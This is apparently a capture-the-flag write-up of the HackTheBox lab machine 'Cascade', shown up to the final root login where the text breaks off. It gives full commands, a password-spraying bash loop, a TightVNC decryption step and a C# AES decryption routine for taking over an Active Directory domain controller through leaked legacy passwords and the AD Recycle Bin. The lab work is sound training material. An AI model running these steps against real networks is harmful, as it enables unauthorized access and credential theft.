Cascade was a cool 30 point box created by VbScrub. It started out with some LDAP enumeration that allowed you to find a Base64 encoded password which you then use to log into SMB, after that you discover a VNC encrypted password which you can crack using an interactive ruby shell and then use to login via WinRM to get user. After that you have to decrypt a password from an audit database file utilising some C#, you then login and discover you have the AD Recycle Bin group privileges allowing you to recover a temporary administrator password. You then login as admin and get root.
User.txt
Nmap
A quick nmap scan reveals the following ports:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# nmap -sT -p- --min-rate 5000 10.10.10.182
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Focusing on the more important ports we get the following information:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# nmap -sV -sC -T4 10.10.10.182 -p 53,389,445
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-24T10:16:45
|_ start_date: 2020-07-24T04:15:36
SMB
Running nullinux you’re able to acquire a list of valid users from the host:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# nullinux -users 10.10.10.182
Starting nullinux v5.4.1 | 07-24-2020 06:12
[*] Enumerating Domain Information for: 10.10.10.182
[+] Domain Name: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Group: Domain Users
administrator
krbtgt
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
I saved these to a file as they may come in handy at a later stage. I couldn’t access/list any shares anonymously so I moved on to check out what information could be extracted from LDAP.
LDAP
The following command will dump information held with the Person object class - user information (logon count, samaccountname, etc.)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)'
# CascGuest, Users, cascade.local
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: CascGuest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109153140.0Z
whenChanged: 20200110160637.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local
uSNChanged: 45094
name: CascGuest
objectGUID:: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: CascGuest
sAMAccountType: 805306368
userPrincipalName: CascGuest@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200109175934.0Z
dSCorePropagationData: 20200109154857.0Z
dSCorePropagationData: 16010714223649.0Z
lastLogonTimestamp: 132230700642958462
# CASC-DC1, Domain Controllers, cascade.local
dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local
...
This dumps a lot of information, however using grep we can narrow down the output significantly based on supplied keywords:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i samaccountname
sAMAccountName: CascGuest
sAMAccountName: CASC-DC1$
sAMAccountName: arksvc
sAMAccountName: s.smith
sAMAccountName: r.thompson
sAMAccountName: util
sAMAccountName: j.wakefield
sAMAccountName: s.hickson
sAMAccountName: j.goodhand
sAMAccountName: a.turnbull
sAMAccountName: e.crowe
sAMAccountName: b.hanson
sAMAccountName: d.burman
sAMAccountName: BackupSvc
sAMAccountName: j.allen
sAMAccountName: i.croft
I decided to grep for specific strings like password, secret, key, user, etc. but these returned nothing particularly interesting.
A common factor to check for is the logonCount (to identify live accounts) and badPwdCount (identify accounts with potentially weak passwords). I grepped for the string pwd and was surprised when I saw cascadeLegacyPwd in the output:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i pwd
badPwdCount: 0
pwdLastSet: 0
badPwdCount: 0
pwdLastSet: 132400377614404824
badPwdCount: 0
pwdLastSet: 132230603002172876
badPwdCount: 0
pwdLastSet: 132247150854857364
badPwdCount: 0
pwdLastSet: 132230718862636251
cascadeLegacyPwd: clk0bjVldmE=
badPwdCount: 0
pwdLastSet: 132233548311955855
badPwdCount: 0
pwdLastSet: 132230756844150124
badPwdCount: 0
pwdLastSet: 132233522678003963
badPwdCount: 0
pwdLastSet: 132233532260320793
badPwdCount: 0
pwdLastSet: 132233533933579732
badPwdCount: 0
pwdLastSet: 132233607021669462
badPwdCount: 0
pwdLastSet: 132234069391538655
badPwdCount: 0
pwdLastSet: 132234069729591249
badPwdCount: 0
pwdLastSet: 132234070231912131
badPwdCount: 0
pwdLastSet: 132234098399165604
badPwdCount: 0
pwdLastSet: 132235983818652005
The password is Base64 encoded and decodes to rY4n5eva
1
2
# echo clk0bjVldmE= | base64 -d; echo
rY4n5eva
My crackmapexec install was not working at the time so I made a quick bash script to see which user the password was for:
1
2
3
4
5
6
7
#!/bin/bash
for i in $(cat /root/users)
do
echo "User: $i"
smbmap -H 10.10.10.182 -u $i -p rY4n5eva
done
Running the script shows that r.thompson is the correct user:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# ./smb.sh
User: arksvc
[!] Authentication error on 10.10.10.182
User: s.smith
[!] Authentication error on 10.10.10.182
User: r.thompson
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
User: util
[!] Authentication error on 10.10.10.182
User: j.wakefield
[!] Authentication error on 10.10.10.182
User: s.hickson
[!] Authentication error on 10.10.10.182
User: j.goodhand
[!] Authentication error on 10.10.10.182
User: a.turnbull
[!] Authentication error on 10.10.10.182
User: e.crowe
[!] Authentication error on 10.10.10.182
User: b.hanson
[!] Authentication error on 10.10.10.182
User: d.burman
[!] Authentication error on 10.10.10.182
User: BackupSvc
[!] Authentication error on 10.10.10.182
User: j.allen
[!] Authentication error on 10.10.10.182
User: i.croft
[!] Authentication error on 10.10.10.182
SMB
The Data share caught my eye, the references to the AD Recycle Bin were interesting aswell as a VNC Install.reg file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R 'Data'
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
Data READ ONLY
.\Data\*
dr--r--r-- 0 Tue Jan 28 17:05:51 2020 .
dr--r--r-- 0 Tue Jan 28 17:05:51 2020 ..
dr--r--r-- 0 Sun Jan 12 20:45:14 2020 Contractors
dr--r--r-- 0 Sun Jan 12 20:45:10 2020 Finance
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 IT
dr--r--r-- 0 Sun Jan 12 20:45:20 2020 Production
dr--r--r-- 0 Sun Jan 12 20:45:16 2020 Temps
.\Data\IT\*
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 .
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 ..
dr--r--r-- 0 Tue Jan 28 13:00:30 2020 Email Archives
dr--r--r-- 0 Tue Jan 28 13:04:51 2020 LogonAudit
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 Logs
dr--r--r-- 0 Tue Jan 28 17:06:59 2020 Temp
.\Data\IT\Email Archives\*
dr--r--r-- 0 Tue Jan 28 13:00:30 2020 .
dr--r--r-- 0 Tue Jan 28 13:00:30 2020 ..
fr--r--r-- 2522 Tue Jan 28 13:00:30 2020 Meeting_Notes_June_2018.html
.\Data\IT\Logs\*
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 .
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 ..
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 Ark AD Recycle Bin
dr--r--r-- 0 Tue Jan 28 19:56:00 2020 DCs
.\Data\IT\Logs\Ark AD Recycle Bin\*
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 .
dr--r--r-- 0 Tue Jan 28 19:53:04 2020 ..
fr--r--r-- 1303 Tue Jan 28 20:19:11 2020 ArkAdRecycleBin.log
.\Data\IT\Logs\DCs\*
dr--r--r-- 0 Tue Jan 28 19:56:00 2020 .
dr--r--r-- 0 Tue Jan 28 19:56:00 2020 ..
fr--r--r-- 5967 Sun Jan 26 17:22:05 2020 dcdiag.log
.\Data\IT\Temp\*
dr--r--r-- 0 Tue Jan 28 17:06:59 2020 .
dr--r--r-- 0 Tue Jan 28 17:06:59 2020 ..
dr--r--r-- 0 Tue Jan 28 17:06:55 2020 r.thompson
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 s.smith
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 15:00:01 2020 VNC Install.reg
I decided to login and recursively downloaded every file in the share using smbclient:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# smbclient \\\\10.10.10.182\\Data -U=r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
13106687 blocks of size 4096. 7797638 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (7.6 KiloBytes/sec) (average 7.6 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (4.0 KiloBytes/sec) (average 5.8 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (18.1 KiloBytes/sec) (average 9.9 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (8.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
smb: \>
The output is then saved locally to Kali:
1
2
# ls
Contractors Finance IT Production Temps
You can then see the files that’ve been downloaded:
1
2
3
4
5
# find . -type f
./IT/Temp/s.smith/VNC Install.reg
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs/dcdiag.log
./IT/Email Archives/Meeting_Notes_June_2018.html
The ArkAdRecycleBin.log file contained some interesting information:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
Although, this is of no particular use to us now. The VNC Install.reg file however contained an interesting string: "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# cat IT/Temp/s.smith/VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
VNC Password Decryption
Googling around to identify and decrypt the string I came across the following page on Github. The article states that using an interactive ruby shell from Msfconsole you’re able to decrypt the string in 3 easy steps:
1
2
3
4
5
6
7
8
9
10
11
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6bcf2a4b6e5aca0f"].pack('H*'), fixedkey
=> "sT333ve2"
The password is sT333ve2. As the file was in the s.smith share we can presume that this is the password for that account.
Flag
This holds true and you can simply login with evil-winrm and type the user flag:
1
2
3
4
5
6
7
8
9
10
11
# evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> type desktop/user.txt
aad2e8...
Root.txt
SMB
There wasn’t much to offer on the host logged in as s.smith so I decided to check out what shares the account had access to:
1
2
3
4
5
6
7
8
9
10
11
12
# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
The Audit$ share stands out immediately. Recursively listing the contents of the share displays some interesting looking files:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R 'Audit$'
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
Audit$ READ ONLY
.\Audit$\*
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 .
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 ..
fr--r--r-- 13312 Tue Jan 28 16:47:08 2020 CascAudit.exe
fr--r--r-- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 DB
fr--r--r-- 45 Tue Jan 28 18:29:47 2020 RunAudit.bat
fr--r--r-- 363520 Tue Jan 28 15:42:18 2020 System.Data.SQLite.dll
fr--r--r-- 186880 Tue Jan 28 15:42:18 2020 System.Data.SQLite.EF6.dll
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x64
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x86
.\Audit$\DB\*
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 .
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 ..
fr--r--r-- 24576 Tue Jan 28 16:43:18 2020 Audit.db
.\Audit$\x64\*
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 .
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 ..
fr--r--r-- 1639936 Tue Jan 28 15:42:18 2020 SQLite.Interop.dll
.\Audit$\x86\*
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 .
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 ..
fr--r--r-- 1246720 Tue Jan 28 15:42:18 2020 SQLite.Interop.dll
I then downloaded all of them using smbclient:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# smbclient \\\\10.10.10.182\\Audit$ -U=s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe A 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll A 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
13106687 blocks of size 4096. 7796288 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (32.6 KiloBytes/sec) (average 32.6 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (37.2 KiloBytes/sec) (average 34.6 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as Audit.db (75.7 KiloBytes/sec) (average 47.2 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.1 KiloBytes/sec) (average 36.3 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (704.4 KiloBytes/sec) (average 217.9 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (177.7 KiloBytes/sec) (average 203.6 KiloBytes/sec)
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (1324.6 KiloBytes/sec) (average 535.0 KiloBytes/sec)
getting file \x86\SQLite.Interop.dll of size 1246720 as SQLite.Interop.dll (805.2 KiloBytes/sec) (average 607.9 KiloBytes/sec)
smb: \>
File Analysis
The Audit.db file caught my eye initially so I decided to open it up in sqliteonline.com and see if it contained any juicy info. Running SELECT * FROM ldap; in the console displays the username ArkSvc and what appears to be a Base64 encoded password:
I attempted to Base64 decode the password but it just spat out some random junk. Based upon this and the CascCrypto.dll in the share I presumed the password was encrypted in some way (in addition to Base64).
dnSpy
Throwing the DLL into dnSpy allowed me to see if there was a decrypt function that could be used to get the plaintext password for the ArkSvc account.
As you can see the encrypted string and the key are required for the decrypt function. I couldn’t find the key in the DLL so I chucked the CascAudit.exe executable into dnSpy to try and find the key.
After a quick look around I found the key in the following location:
Decrypt Function
I copied the decrypt function from the DLL into the dotnetfiddle.net online C# compiler, with a couple of small additions to write the decrypted string in the console output and so the code would run correctly:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
public class Crypto
{
public static void Main()
{
Console.WriteLine(DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"));
}
public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
string @string;
using (MemoryStream memoryStream = new MemoryStream(array))
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
@string = Encoding.UTF8.GetString(array2);
}
}
return @string;
}
// Token: 0x04000006 RID: 6
public const string DefaultIV = "1tdyjCbY1Ix49842";
// Token: 0x04000007 RID: 7
public const int Keysize = 128;
}
Running the code displays the following decrypted password: w3lc0meFr31nd
You can then evil-winrm into the host with ArkSvc / w3lc0meFr31nd credentials:
1
2
3
4
5
6
7
8
# evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
AD Recycle Bin
Running whoami /all you’ll notice the we’re a member of the AD Recycle Bin group:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Earlier on you may recall that we encountered an ArkAdRecycleBin.log log file found in the Data SMB share:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
The TempAdmin entry looks interesting, let’s check if any of the deleted items contain some sensitive information. We can do so using the following command:
1
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
This returns a lot of information, however the last entry has some juicy details:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Right at the top you’ll notice the following: cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz. Decrypting the Base64 encoded string displays the following password:
1
2
# echo YmFDVDNyMWFOMDBkbGVz | base64 -d; echo
baCT3r1aN00dles
Presumably belonging to the admin.
Flag
You can then simply login via WinRM and type the root flag:
1
2
3
